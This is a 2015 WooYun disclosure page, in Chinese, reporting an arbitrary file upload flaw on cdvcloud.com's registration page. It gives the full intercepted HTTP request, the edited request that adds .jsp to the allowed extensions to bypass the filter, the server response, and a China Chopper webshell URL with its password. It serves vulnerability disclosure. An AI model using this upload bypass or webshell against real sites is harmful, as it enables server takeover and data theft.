当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095206

漏洞标题:云视某处任意文件上传漏洞导致可直接getshell

相关厂商:cdvcloud.com

漏洞作者:

提交时间:2015-02-02 14:58

修复时间:2015-03-19 15:00

公开时间:2015-03-19 15:00

漏洞类型:成功的入侵事件

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商已经确认,细节仅向厂商公开
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-19: 细节向公众公开

简要描述:

*

详细说明:

在注册页面:http://onair.cdvcloud.com/user/toRegisterInfo/

2.png


上传营业执照这里
点击上传
在上传的时候抓包

POST /upload/uploadImage/ HTTP/1.1
Host: onair.cdvcloud.com
Proxy-Connection: keep-alive
Content-Length: 6931
Origin: http://onair.cdvcloud.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Accept: */*
Referer: http://onair.cdvcloud.com/user/toRegisterInfo/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EF8625ED52CAD46F6012112D3ECF2B29; Hm_lvt_2f5f6d7e03a6a13ced048ec353c47391=1422855851,1422855857,1422856287,1422856332; Hm_lpvt_2f5f6d7e03a6a13ced048ec353c47391=1422856335
------------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Content-Disposition: form-data; name="Filename"
cd.jsp;.jpg
------------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Content-Disposition: form-data; name="fileext"
*.jpg;*.png;*.gif
------------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Content-Disposition: form-data; name="folder"
/user/toRegisterInfo/
------------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Content-Disposition: form-data; name="uploadifyVideo"; filename="cd.jsp;.jpg"
Content-Type: application/octet-stream


修改抓包数据

POST /upload/uploadImage/ HTTP/1.1
Host: onair.cdvcloud.com
Proxy-Connection: keep-alive
Content-Length: 6931
Origin: http://onair.cdvcloud.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Accept: */*
Referer: http://onair.cdvcloud.com/user/toRegisterInfo/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EF8625ED52CAD46F6012112D3ECF2B29; Hm_lvt_2f5f6d7e03a6a13ced048ec353c47391=1422855851,1422855857,1422856287,1422856332; Hm_lpvt_2f5f6d7e03a6a13ced048ec353c47391=1422856335
------------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Content-Disposition: form-data; name="Filename"
cd.jsp
------------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Content-Disposition: form-data; name="fileext"
*.jpg;*.png;*.gif;.jsp
------------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Content-Disposition: form-data; name="folder"
/user/toRegisterInfo/
------------Ef1Ef1ae0ae0cH2KM7cH2GI3GI3ei4
Content-Disposition: form-data; name="uploadifyVideo"; filename="cd.jsp"
Content-Type: application/octet-stream


然后上传

HTTP/1.1 200 OK
Server: nginx/1.1.8
Date: Mon, 02 Feb 2015 05:59:59 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 77
Connection: keep-alive
Accept-Charset: big5, big5-hkscs, compound_text, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-solaris, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1381, x-ibm1383, x-ibm33722, x-ibm737, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp
http://onair.cdvcloud.com:80/uploads/b85f6116-db2c-4455-a064-b099856ea8cc.jsp


获得菜刀地址:http://onair.cdvcloud.com:80/uploads/b85f6116-db2c-4455-a064-b099856ea8cc.jsp
密码ken

2.png


貌似网站上装了什么防护软件,上传菜刀马很快删了,没有做深入测试,既然获得了shell,后面能做的,相比危害厂商应该很清楚,数据库泄露甚至到漫游内网都可以。
测试上传个TXT证明漏洞吧:
http://onair.cdvcloud.com:80/uploads/88702e04-3172-423d-bd2e-1eedcf625ef5.txt
还有:弱弱的问一下,礼物到底有木有?

漏洞证明:

RT

修复方案:

*我的礼物到底有木有啊?

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-02 16:24

厂商回复:

谢谢,礼物我跟公司申请一下,有了通知你

最新状态:

暂无